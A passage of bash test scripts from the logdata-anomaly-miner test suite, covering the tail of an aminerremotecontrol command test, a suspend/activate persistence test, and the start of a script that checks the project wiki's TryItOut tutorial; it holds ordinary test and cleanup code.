expected="$PREFIX\"FAILURE: the value of the property $property must be of type !\"" expected_list="${expected_list}${expected} " if [[ "$stdout" != "$expected" && "$stdout" != "$PREFIX'FAILURE: it is not safe to run the aminer with less than 32MB RAM.'" ]]; then echo "$ERROR changing $property wrong Type." echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi echo "change_config_property(analysis_context, $property, 1)" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "change_config_property(analysis_context, $property, 1)") expected="$PREFIX\"$property changed to '1' successfully.\"" if [[ "$stdout" == "$PREFIX'FAILURE: it is not safe to run the aminer with less than 32MB RAM.'" ]]; then expected_list="${expected_list}${stdout} " else expected_list="${expected_list}${expected} " fi if [[ "$stdout" != "$expected" && "$stdout" != "$PREFIX'FAILURE: it is not safe to run the aminer with less than 32MB RAM.'" ]]; then echo "$ERROR changing $property to 1." echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi done properties=("'Log.StatisticsLevel'" "'Log.DebugLevel'") for property in "${properties[@]}"; do value=0 echo "change_config_property(analysis_context, $property, $value)" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "change_config_property(analysis_context, $property, $value)") expected="$PREFIX\"$property changed to '$value' successfully.\"" expected_list="${expected_list}${expected} " if [[ "$stdout" != "$expected" ]]; then echo "$ERROR changing $property to $value." echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi value=1 echo "change_config_property(analysis_context, $property, $value)" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "change_config_property(analysis_context, $property, $value)") expected="$PREFIX\"$property changed to '$value' successfully.\"" expected_list="${expected_list}${expected} " if [[ "$stdout" != "$expected" ]]; then echo "$ERROR changing $property to $value." echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi value=2 echo "change_config_property(analysis_context, $property, $value)" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "change_config_property(analysis_context, $property, $value)") expected="$PREFIX\"$property changed to '$value' successfully.\"" expected_list="${expected_list}${expected} " if [[ "$stdout" != "$expected" ]]; then echo "$ERROR changing $property to $value." echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi value=-1 echo "change_config_property(analysis_context, $property, $value)" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "change_config_property(analysis_context, $property, $value)") expected="$PREFIX'FAILURE: STAT_LEVEL $value is not allowed. Allowed STAT_LEVEL values are 0, 1, 2.'" if [[ "$stdout" == "$PREFIX'FAILURE: DEBUG_LEVEL $value is not allowed. Allowed DEBUG_LEVEL values are 0, 1, 2.'" ]]; then expected_list="${expected_list}${stdout} " else expected_list="${expected_list}${expected} " fi if [[ "$stdout" != "$expected" && "$stdout" != "$PREFIX'FAILURE: DEBUG_LEVEL $value is not allowed. Allowed DEBUG_LEVEL values are 0, 1, 2.'" ]]; then echo "$ERROR changing $property to $value." echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi value=3 echo "change_config_property(analysis_context, $property, $value)" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "change_config_property(analysis_context, $property, $value)") expected="$PREFIX'FAILURE: STAT_LEVEL $value is not allowed. Allowed STAT_LEVEL values are 0, 1, 2.'" if [[ "$stdout" == "$PREFIX'FAILURE: DEBUG_LEVEL $value is not allowed. Allowed DEBUG_LEVEL values are 0, 1, 2.'" ]]; then expected_list="${expected_list}${stdout} " else expected_list="${expected_list}${expected} " fi if [[ "$stdout" != "$expected" && "$stdout" != "$PREFIX'FAILURE: DEBUG_LEVEL $value is not allowed. Allowed DEBUG_LEVEL values are 0, 1, 2.'" ]]; then echo "$ERROR changing $property to $value." echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi done echo "rename_registered_analysis_component(analysis_context,'NewMatchPathValueCombo','NewMatchPathValueComboDetector')" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "rename_registered_analysis_component(analysis_context,'NewMatchPathValueCombo','NewMatchPathValueComboDetector')") expected="$PREFIX\"Component 'NewMatchPathValueCombo' renamed to 'NewMatchPathValueComboDetector' successfully.\"" expected_list="${expected_list}${expected} " if [[ "$stdout" != "$expected" ]]; then echo "$ERROR renames the 'NewMatchPathValueCombo' component to 'NewMatchPathValueComboDetector'." echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi echo "rename_registered_analysis_component(analysis_context,'NewMatchPathValueComboDetector', 222)" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "rename_registered_analysis_component(analysis_context,'NewMatchPathValueComboDetector', 222)") expected="$PREFIX\"FAILURE: the parameters 'old_component_name' and 'new_component_name' must be of type str.\"" expected_list="${expected_list}${expected} " if [[ "$stdout" != "$expected" ]]; then echo "$ERROR renames the 'NewMatchPathValueComboDetector' wrong Type. (no string; integer value)" echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi echo "rename_registered_analysis_component(analysis_context,'NonExistingDetector','NewMatchPathValueComboDetector')" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "rename_registered_analysis_component(analysis_context,'NonExistingDetector','NewMatchPathValueComboDetector')") expected="$PREFIX\"FAILURE: the component 'NonExistingDetector' does not exist.\"" expected_list="${expected_list}${expected} " if [[ "$stdout" != "$expected" ]]; then echo "$ERROR renames a non existing component to 'NewMatchPathValueComboDetector'." echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi echo "change_attribute_of_registered_analysis_component(analysis_context, 'NewMatchPathValueComboDetector', 'learn_mode', False)" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "change_attribute_of_registered_analysis_component(analysis_context, 'NewMatchPathValueComboDetector', 'learn_mode', False)") expected="$PREFIX\"'NewMatchPathValueComboDetector.learn_mode' changed from False to False successfully.\"" expected_list="${expected_list}${expected} " if [[ "$stdout" != "$expected" ]]; then echo "$ERROR changes the 'learn_mode' of the 'NewMatchPathValueComboDetector' to False." echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi echo "change_attribute_of_registered_analysis_component(analysis_context, 'NewMatchPathValueComboDetector', 'learn_mode', 'True')" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "change_attribute_of_registered_analysis_component(analysis_context, 'NewMatchPathValueComboDetector', 'learn_mode', 'True')") expected="$PREFIX\"FAILURE: property 'NewMatchPathValueComboDetector.learn_mode' must be of type !\"" expected_list="${expected_list}${expected} " if [[ "$stdout" != "$expected" ]]; then echo "$ERROR changes the 'learn_mode' of the 'NewMatchPathValueComboDetector' wrong Type." echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi echo "print_attribute_of_registered_analysis_component(analysis_context, 'NewMatchPathValueComboDetector', 'target_path_list')" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "print_attribute_of_registered_analysis_component(analysis_context, 'NewMatchPathValueComboDetector', 'target_path_list')") expected="$PREFIX'\"NewMatchPathValueComboDetector.target_path_list\": [\"/model/IPAddresses/Username\", \"/model/IPAddresses/IP\"]'" expected_list="${expected_list}${expected} " if [[ "$stdout" != "$expected" ]]; then echo "$ERROR prints the current list of paths." echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi echo "print_attribute_of_registered_analysis_component(analysis_context, 'NewMatchPathValueComboDetector', 'other_path_list')" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "print_attribute_of_registered_analysis_component(analysis_context, 'NewMatchPathValueComboDetector', 'other_path_list')") expected="$PREFIX\"FAILURE: the component 'NewMatchPathValueComboDetector' does not have an attribute named 'other_path_list'.\"" expected_list="${expected_list}${expected} " if [[ "$stdout" != "$expected" ]]; then echo "$ERROR prints not existing attribute." echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi echo "add_handler_to_atom_filter_and_register_analysis_component(analysis_context, 'AtomFilter', NewMatchPathDetector(analysis_context.aminer_config, analysis_context.atomizer_factory.atom_handler_list, learn_mode=True), 'NewMatchPathDet')" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "add_handler_to_atom_filter_and_register_analysis_component(analysis_context, 'AtomFilter', NewMatchPathDetector(analysis_context.aminer_config, analysis_context.atomizer_factory.atom_handler_list, learn_mode=True), 'NewMatchPathDet')") expected="$PREFIX\"Component 'NewMatchPathDet' added to 'AtomFilter' successfully.\"" expected_list="${expected_list}${expected} " if [[ "$stdout" != "$expected" ]]; then echo "$ERROR add a new NewMatchPathDetector to the config." echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi echo "add_handler_to_atom_filter_and_register_analysis_component(analysis_context, 'AtomFilter', 'StringDetector', 'StringDetector')" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "add_handler_to_atom_filter_and_register_analysis_component(analysis_context, 'AtomFilter', 'StringDetector', 'StringDetector')") expected="$PREFIX\"FAILURE: 'component' must implement the AtomHandlerInterface!\"" expected_list="${expected_list}${expected} " if [[ "$stdout" != "$expected" ]]; then echo "$ERROR add a wrong class to the config." echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi echo "save_current_config(analysis_context,'/tmp/config.py')" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "save_current_config(analysis_context,'/tmp/config.py')") expected="${PREFIX}\"${NOT_FOUND_WARNINGS}Successfully saved the current config to /tmp/config.py.\"" expected_list="${expected_list}${expected} " if [[ "$stdout" != "$expected" ]]; then echo "$ERROR save the current config to /tmp/config.py." echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi sudo rm /tmp/config.py echo "save_current_config(analysis_context,'[/path/config.py')" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "save_current_config(analysis_context,'[/path/config.py')") expected="${PREFIX}'Exception: [/path/config.py is not a valid filename!'" expected_list="${expected_list}${expected} " if [[ "$stdout" != "$expected" ]]; then echo "$ERROR save the current config to an invalid path." echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi echo "save_current_config(analysis_context,'/notExistingPath/config.py')" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "save_current_config(analysis_context,'/notExistingPath/config.py')") expected="${PREFIX}\"${NOT_FOUND_WARNINGS}FAILURE: file '/notExistingPath/config.py' could not be found or opened!\"" expected_list="${expected_list}${expected} " if [[ "$stdout" != "$expected" ]]; then echo "$ERROR save the current config to an not existing directory path." echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi echo "persist_all()" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "persist_all()") expected="${PREFIX}'OK'" expected_list="${expected_list}${expected} " if [[ "$stdout" != "$expected" ]]; then echo "$ERROR persist_all." echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi # echo "create_backup(analysis_context)" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "create_backup(analysis_context)") expected="${PREFIX}'Created backup " # expected_list="${expected_list}${expected} # " if [[ "$stdout" != "$expected"* ]]; then echo "$ERROR creating backup." echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi # echo "list_backups(analysis_context)" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "list_backups(analysis_context)") expected="${PREFIX}'\"backups\": [" # expected_list="${expected_list}${expected} # " if [[ "$stdout" != "$expected"* ]]; then echo "$ERROR listing backups." echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi timestamp=$(date +%s) echo "allowlist_event_in_component(analysis_context,'EnhancedNewValueCombo',($timestamp,'/model/path'),allowlisting_data=None)" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "allowlist_event_in_component(analysis_context,'EnhancedNewValueCombo',($timestamp,'/model/path'),allowlisting_data=None)") expected="${PREFIX}\"Allowlisted path(es) /model/DailyCron/UName, /model/DailyCron/JobNumber with ($timestamp, '/model/path').\"" expected_list="${expected_list}${expected} " if [[ "$stdout" != "$expected" ]]; then echo "$ERROR allowlist_event EnhancedNewMatchPathDetector." echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi echo "allowlist_event_in_component(analysis_context,'MissingMatch',(' ','/model/DiskReport/Space'),allowlisting_data=-1)" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "allowlist_event_in_component(analysis_context,'MissingMatch',(' ','/model/DiskReport/Space'),allowlisting_data=-1)") expected="${PREFIX}\"Updated ' ' in '/model/DiskReport/Space' to new interval 2.\"" expected_list="${expected_list}${expected} " if [[ "$stdout" != "$expected" ]]; then echo "$ERROR allowlist_event MissingMatchPathDetector." echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi echo "allowlist_event_in_component(analysis_context,'NewMatchPath','/model/somepath',allowlisting_data=None)" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "allowlist_event_in_component(analysis_context,'NewMatchPath','/model/somepath',allowlisting_data=None)") expected="${PREFIX}'Allowlisted path(es) /model/somepath in Analysis.NewMatchPathDetector.'" expected_list="${expected_list}${expected} " if [[ "$stdout" != "$expected" ]]; then echo "$ERROR allowlist_event NewMatchPathDetector." echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi echo "allowlist_event_in_component(analysis_context,'NewMatchPathValueComboDetector','/model/somepath',allowlisting_data=None)" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "allowlist_event_in_component(analysis_context,'NewMatchPathValueComboDetector','/model/somepath',allowlisting_data=None)") expected="${PREFIX}'Allowlisted path(es) /model/IPAddresses/Username, /model/IPAddresses/IP with /model/somepath.'" expected_list="${expected_list}${expected} " if [[ "$stdout" != "$expected" ]]; then echo "$ERROR allowlist_event NewMatchPathValueCombo." echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi echo "allowlist_event_in_component(analysis_context,'NewMatchIdValueComboDetector','/model/somepath',allowlisting_data=None)" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "allowlist_event_in_component(analysis_context,'NewMatchIdValueComboDetector','/model/somepath',allowlisting_data=None)") expected="${PREFIX}'Allowlisted path(es) /model/type/path/name, /model/type/syscall/syscall with /model/somepath.'" expected_list="${expected_list}${expected} " if [[ "$stdout" != "$expected" ]]; then echo "$ERROR allowlist_event NewMatchIdValueComboDetector." echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi echo "allowlist_event_in_component(analysis_context,'EventCorrelationDetector','/model/somepath',allowlisting_data=None)" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "allowlist_event_in_component(analysis_context,'EventCorrelationDetector','/model/somepath',allowlisting_data=None)") expected="${PREFIX}'Allowlisted path /model/somepath.'" expected_list="${expected_list}${expected} " if [[ "$stdout" != "$expected" ]]; then echo "$ERROR allowlist_event EventCorrelationDetector." echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi echo "allowlist_event_in_component(analysis_context,'NewMatchPathValue','/model/somepath',allowlisting_data=None)" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "allowlist_event_in_component(analysis_context,'NewMatchPathValue','/model/somepath',allowlisting_data=None)") expected="${PREFIX}'Allowlisted path(es) /model/DailyCron/Job Number, /model/IPAddresses/Username with /model/somepath.'" expected_list="${expected_list}${expected} " if [[ "$stdout" != "$expected" ]]; then echo "$ERROR allowlist_event NewMatchPathValueDetector." echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi echo "blocklist_event_in_component(analysis_context,'EventCorrelationDetector','/model/somepath',blocklisting_data=None)" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "blocklist_event_in_component(analysis_context,'EventCorrelationDetector','/model/somepath',blocklisting_data=None)") expected="${PREFIX}'Blocklisted path /model/somepath.'" expected_list="${expected_list}${expected} " if [[ "$stdout" != "$expected" ]]; then echo "$ERROR blocklist_event EventCorrelationDetector." echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi echo "blocklist_event_in_component(analysis_context,'EventCorrelationDetector','/model/somepath',blocklisting_data=None)" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "blocklist_event_in_component(analysis_context,'EventCorrelationDetector','/model/somepath',blocklisting_data=None)") expected="${PREFIX}'Blocklisted path /model/somepath.'" expected_list="${expected_list}${expected} " if [[ "$stdout" != "$expected" ]]; then echo "$ERROR blocklist_event EventCorrelationDetector." echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi EXEC_TIME=$(($(date +%s)-START_TIME)) echo "print_current_config(analysis_context)" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "print_current_config(analysis_context)") expected="$PREFIX None" if [[ "$stdout" == "$expected" ]]; then echo "$ERROR print config had an execution error." echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi stdout=$(echo "$stdout" | sed -e "s/\"next_persist_time\".*,//") expected_list="${expected_list}${stdout} " echo "reopen_event_handler_streams(analysis_context)" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "reopen_event_handler_streams(analysis_context)") expected="$PREFIX'Reopened all StreamPrinterEventHandler streams.'" if [[ "$stdout" != "$expected" ]]; then echo "$ERROR reopen_event_handler_streams had an execution error." echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi stdout=$(echo "$stdout" | sed -e "s/\"next_persist_time\".*,//") expected_list="${expected_list}${stdout} " sudo pkill -x aminer sleep 2 & wait $! sudo mkdir /tmp/lib 2> /dev/null sudo mkdir /tmp/lib/aminer 2> /dev/null sudo rm -r /tmp/lib/aminer/* 2> /dev/null sudo chown -R aminer:aminer /tmp/lib 2> /dev/null sudo rm /tmp/syslog 2> /dev/null touch /tmp/syslog sudo aminer --config "$FILE" & > /dev/null sleep 1 START_TIME=$(date +%s) stdout=$(sudo aminerremotecontrol --exec-file $CMD_PATH) stdout=$(echo "$stdout" | sed -e "s/\"next_persist_time\".*,//") expected_list=$(echo "$expected_list" | sed -e "s/\"next_persist_time\".*,//") if [[ "$stdout" != "$expected_list" ]]; then echo "$ERROR exec-file." echo "$stdout" echo echo "Expected: $expected_list" echo exit_code=1 fi EXEC_FILE_TIME=$(($(date +%s)-START_TIME)) sudo pkill -x aminer sleep 2 & wait $! sudo rm $CMD_PATH echo "Command execution time with --exec ${EXEC_TIME}s" echo "Command execution time with --exec-file ${EXEC_FILE_TIME}s" exit $exit_code logdata-anomaly-miner-2.6.1/aecid-testsuite/runSuspendModeTest.sh000077500000000000000000000062741437606560100251700ustar00rootroot00000000000000sudo cp demo/aminerRemoteControl/demo-config.py /tmp/demo-config.py echo "config_properties['Core.PersistencePeriod'] = 10" | sudo tee -a /tmp/demo-config.py > /dev/null sudo chown aminer:aminer /tmp/demo-config.py 2> /dev/null sudo rm -r /tmp/lib/aminer/* 2> /dev/null sudo mkdir /tmp/lib 2> /dev/null sudo mkdir /tmp/lib/aminer 2> /dev/null sudo mkdir /tmp/lib/aminer/log 2> /dev/null sudo chown -R aminer:aminer /tmp/lib 2> /dev/null sudo rm /tmp/syslog 2> /dev/null touch /tmp/syslog ln -s $PWD/../source/root/usr/lib/logdata-anomaly-miner/aminerremotecontrol.py $PWD/aminerremotecontrol FILE=/tmp/demo-config.py if ! test -f "$FILE"; then echo "$FILE does not exist!" exit 1 fi exit_code=0 SUSPEND_FILE=/tmp/suspend_output.txt SUSPEND_FILE_MD5=/tmp/suspend.md5 sudo aminer --config "$FILE" > $SUSPEND_FILE & PID=$! sleep 5 md5sum $SUSPEND_FILE > $SUSPEND_FILE_MD5 2> /dev/null echo "User username logged in" >> /tmp/syslog sleep 1 md5_result=`md5sum -c $SUSPEND_FILE_MD5 2> /dev/null` if [[ $md5_result == "$SUSPEND_FILE: OK" ]]; then echo 'The aminer should have produced outputs, but md5sum does not indicate any changes. (1)' exit_code=1 fi find /tmp/lib/aminer -type f ! -path "/tmp/lib/aminer/log/aminerRemoteLog.txt" ! -path "/tmp/lib/aminer/log/aminer.log" ! -path "/tmp/lib/aminer/log/statistics.log" -exec md5sum {} \; | tee /tmp/test1.md5 > /dev/null sleep 1 md5sum $SUSPEND_FILE > $SUSPEND_FILE_MD5 2> /dev/null sudo aminerremotecontrol --exec "suspend" > /dev/null echo " Current Disk Data is: Filesystem Type Size Used Avail Use% %" >> /tmp/syslog md5_result=`md5sum -c $SUSPEND_FILE_MD5 2> /dev/null` if [[ $md5_result != "$SUSPEND_FILE: OK" ]]; then echo 'The aminer has produced outputs after being suspended.' exit_code=1 fi sleep 5 find /tmp/lib/aminer -type f ! -path "/tmp/lib/aminer/log/aminerRemoteLog.txt" ! -path "/tmp/lib/aminer/log/aminer.log" ! -path "/tmp/lib/aminer/log/statistics.log" -exec md5sum {} \; | tee /tmp/test2.md5 > /dev/null sudo aminerremotecontrol --exec "activate" > /dev/null if [[ $md5_result == "/tmp/syslog: OK" ]]; then echo 'The aminer should have produced outputs, but md5sum does not indicate any changes. (2)' exit_code=1 fi sleep 10 find /tmp/lib/aminer -type f ! -path "/tmp/lib/aminer/log/aminerRemoteLog.txt" ! -path "/tmp/lib/aminer/log/aminer.log" ! -path "/tmp/lib/aminer/log/statistics.log" -exec md5sum {} \; | tee /tmp/test3.md5 > /dev/null suspend_diff=`diff /tmp/test1.md5 /tmp/test2.md5` activate_diff=`diff /tmp/test2.md5 /tmp/test3.md5` if [[ $suspend_diff != "" ]]; then cat /tmp/test1.md5 cat /tmp/test2.md5 echo 'The aminer should not persist data after being suspended.' exit_code=1 fi if [[ $activate_diff == "" ]]; then cat /tmp/test2.md5 cat /tmp/test3.md5 echo 'The aminer should persist data after being activated.' exit_code=1 fi sudo pkill -x aminer sleep 3 wait $PID if [[ $? != 0 ]]; then exit_code=1 fi sudo rm /tmp/demo-config.py sudo rm /tmp/suspend_output.txt sudo rm /tmp/syslog sudo rm -r /tmp/lib/aminer/* 2> /dev/null sudo rm /tmp/suspend.md5 sudo rm aminerremotecontrol sudo rm /tmp/test1.md5 sudo rm /tmp/test2.md5 sudo rm /tmp/test3.md5 test -e /var/mail/mail && sudo rm -f /var/mail/mail exit $exit_code logdata-anomaly-miner-2.6.1/aecid-testsuite/runTryItOut.sh000077500000000000000000000375071437606560100236500ustar00rootroot00000000000000#!/bin/bash . ./testFunctions.sh ################################################################## # Description of the test. Line numbers are also considering starting lines with ```, so they are incremented by one compared to the text itself. # 1.) Write log lines from 4th to 5th ``` into /tmp/access_00 and /tmp/access_01. # 2.) Read 1st ```python to 6th ``` and compare it with ApacheAccessParsingModel. # 3.) Run the linking command between 7th and 8th ```. # 4.) Run the copy command from the 2nd line between 9th and 10th ``` and extract the CFG_PATH from that line. # 5.) Extract the line between 1st ```yaml and 11th ``` and replace LearnMode: False with it in CFG_PATH. # 6.) Replace LogResourceList path with "/tmp/access_00" in CFG_PATH. # 7.) Replace all Parser config lines in CFG_PATH with Parser config lines between 3rd ```yaml and 13th ```. # 8.) Replace all Input config lines in CFG_PATH with Input config lines between 4th ```yaml and 14th ```. # 9.) Replace all Analysis config lines in CFG_PATH with Analysis config lines between 5th ```yaml and 15th ```. # 10.) Replace all EventHandlers config lines in CFG_PATH with EventHandlers config lines between 6th ```yaml and 16th ```. # 11.) Parse the aminer CMD between 17th and 18th ``` and run it. Check if no error is output by the aminer. # 12.) Compare the results with the count report between 19th and 20th ``` (without actual numbers and timestamps - replace them with constant values). # 13.) Run the rm command between 21st and 22nd ``` to remove the persisted data. # 14.) Replace all Analysis config lines in CFG_PATH with Analysis config lines between 8th ```yaml and 26th ```, run CMD and check if no # error is output by the aminer by comparing the output with the lines between 27th and 28th ```. # 15.) Replace all Analysis config lines in CFG_PATH with Analysis config lines between 10th ```yaml and 34th ```, run CMD and check if no error is output by the aminer. # 16.) Replace all Analysis config lines in CFG_PATH with Analysis config lines between 11th ```yaml and 43th ```, run CMD and check if no error is output by the aminer. # 17.) Replace all Analysis config lines in CFG_PATH with Analysis config lines between 12th ```yaml and 48rd ```, run CMD and check if no error is output by the aminer. # 18.) Replace all Parser config lines in CFG_PATH with Parser config lines between 14th ```yaml and 58rd ```, run CMD and check if no error is output by the aminer. # 19.) Replace all Parser config lines in CFG_PATH with Parser config lines between 17th ```yaml and 65th ```, run CMD and check if no error is output by the aminer. # 20.) Replace all Analysis config lines in CFG_PATH with Analysis config lines between 18th ```yaml and 66st ```, run CMD and check if no error is output by the aminer. # 21.) Replace all Parser config lines in CFG_PATH with Parser config lines between 20th ```yaml and 74th ```, run CMD and check if no error is output by the aminer. # 22.) Replace all Analysis config lines in CFG_PATH with Analysis config lines between 21th ```yaml and 75th ```, run CMD and check if no error is output by the aminer. # 23.) Replace all Parser config lines in CFG_PATH with Parser config lines between 23nd ```yaml and 81th ```, run CMD and check if no error is output by the aminer. # 24.) Replace all Analysis config lines in CFG_PATH with Analysis config lines between 24rd ```yaml and 82th ```, run CMD and check if no error is output by the aminer. # 25.) Write the config between 26th ```yaml and 92th ``` to CFG_PATH, run CMD and check if no error is output by the aminer. ################################################################## BRANCH=main if [ $# -gt 0 ] then BRANCH=$1 fi INPUT_FILE=logdata-anomaly-miner.wiki/aminer-TryItOut.md OUT=/tmp/out.txt LOG1=/tmp/access_00 LOG2=/tmp/access_01 # extract the file from the development branch of the wiki project. # the second ```python script is searched for. git clone https://github.com/ait-aecid/logdata-anomaly-miner.wiki.git 2> /dev/null cd logdata-anomaly-miner.wiki 2> /dev/null git checkout $BRANCH > /dev/null 2>&1 cd .. # write access logs (1.) awk '/^```$/ && ++n == 4, /^```$/ && n++ == 5' < $INPUT_FILE | sed '/^```/ d' > $LOG1 cp $LOG1 $LOG2 # compare ApacheAccessParsingModel (2.) awk '/^```python$/ && ++n == 1, /^```$/' < $INPUT_FILE | sed '/^```/ d' > $OUT OUT1=$(cat $OUT) IN1=$(cat ../source/root/etc/aminer/conf-available/ait-lds/ApacheAccessParsingModel.py) compareStrings "$OUT1" "$IN1" "Failed Test in 2." exit_code=$((exit_code | $?)) # link available configs (3.) awk '/^```$/ && ++n == 7, /^```$/ && n++ == 8' < $INPUT_FILE | sed '/^```/ d' > $OUT CMD=$(cat $OUT) sudo $CMD > $OUT 2> /dev/null # copy template config and extract CFG_PATH. (4.) awk '/^```$/ && ++n == 9, /^```$/ && n++ == 10' < $INPUT_FILE > $OUT CMD=$(sed -n '2p' < $OUT) $CMD IFS=' ' read -ra ADDR <<< "$CMD" CFG_PATH=$(echo "${ADDR[-1]}") # replace LearnMode: False with LearnMode: True in CFG_PATH. (5.) awk '/^```yaml$/ && ++n == 1, /^```$/' < $INPUT_FILE | sed '/^```/ d' > $OUT OUT1=$(cat $OUT) sed "s/#LearnMode: false/${OUT1}/g" $CFG_PATH | sudo tee $CFG_PATH > /dev/null # replace LogResourceList file. (6.) OUT1=$(echo $LOG1) sed "s?file:///var/log/apache2/access.log?file:///${OUT1}?g" $CFG_PATH | sudo tee $CFG_PATH > /dev/null # replace parser, input, analysis and event handler config lines (7.-10.) CFG_BEFORE=$(sed '/^Parser:$/Q' $CFG_PATH) CFG_PARSER=$(awk '/^Parser:$/,/^Input:$/' < $CFG_PATH) CFG_PARSER=$(echo "$CFG_PARSER" | sed '$d') CFG_INPUT=$(awk '/^Input:$/,/^Analysis:$/' < $CFG_PATH) CFG_INPUT=$(echo "$CFG_INPUT" | sed '$d') CFG_ANALYSIS=$(awk '/^Analysis:$/,/^EventHandlers:$/' < $CFG_PATH) CFG_ANALYSIS=$(echo "$CFG_ANALYSIS" | sed '$d') CFG_EVENT_HANDLERS=$(awk '/^EventHandlers:$/,/^$/' < $CFG_PATH) CFG_EVENT_HANDLERS=$(echo "$CFG_EVENT_HANDLERS" | sed '$d') CFG_PARSER=$(awk '/^```yaml$/ && ++n == 3, /^```$/' < $INPUT_FILE | sed '/^```/ d') CFG_INPUT=$(awk '/^```yaml$/ && ++n == 4, /^```$/' < $INPUT_FILE | sed '/^```/ d') CFG_ANALYSIS=$(awk '/^```yaml$/ && ++n == 5, /^```$/' < $INPUT_FILE | sed '/^```/ d') # change report_interval so the test does not need to wait 10 seconds CFG_ANALYSIS=$(echo "$CFG_ANALYSIS" | sed 's/report_interval: 10/report_interval: 3/g') CFG_EVENT_HANDLERS=$(awk '/^```yaml$/ && ++n == 6, /^```$/' < $INPUT_FILE | sed '/^```/ d') echo "$CFG_BEFORE" | sudo tee $CFG_PATH > /dev/null echo "$CFG_PARSER" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_INPUT" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_ANALYSIS" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_EVENT_HANDLERS" | sudo tee -a $CFG_PATH > /dev/null # Parse the aminer CMD and run it. Check if no error is output by the aminer. (11.) awk '/^```$/ && ++n == 17, /^```$/ && n++ == 18' < $INPUT_FILE > $OUT CMD=$(sed -n '2p' < $OUT) runAminerUntilEnd "$CMD -C" "$LOG1" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" if [[ $? != 0 ]]; then exit_code=1 fi testConfigError $OUT "Failed Test in 11." exit_code=$((exit_code | $?)) # Compare the results with the count report. (12.) echo "$(awk '/^{$/ && ++n == 2, /^}$/' < $OUT)" > $OUT # remove NewMatchPathDetector output. IN1=$(sed -n '1,7p' < $OUT) IN2=$(sed -n '8p' < $OUT) IN3=$(sed -n '9p' < $OUT) awk '/^```$/ && ++n == 19, /^```$/ && n++ == 20' < $INPUT_FILE | sed '/^```/ d' > $OUT OUT1=$(sed -n '1,7p' < $OUT) OUT2=$(sed -n '8p' < $OUT) OUT3=$(sed -n '9p' < $OUT) compareStrings "$OUT1" "$IN1" "Failed Test in 12." exit_code=$((exit_code | $?)) IFS=':' read -ra ADDR <<< "$IN2" IN2="${ADDR[0]}" IFS=':' read -ra ADDR <<< "$OUT2" OUT2="${ADDR[0]}" compareStrings "$OUT2" "$IN2" "Failed Test in 12." exit_code=$((exit_code | $?)) IFS=':' read -ra ADDR <<< "$IN3" IN3="${ADDR[0]}" IFS=':' read -ra ADDR <<< "$OUT3" OUT3="${ADDR[0]}" compareStrings "$OUT3" "$IN3" "Failed Test in 12." exit_code=$((exit_code | $?)) # Remove the persisted data. (13.) awk '/^```$/ && ++n == 21, /^```$/ && n++ == 22' < $INPUT_FILE 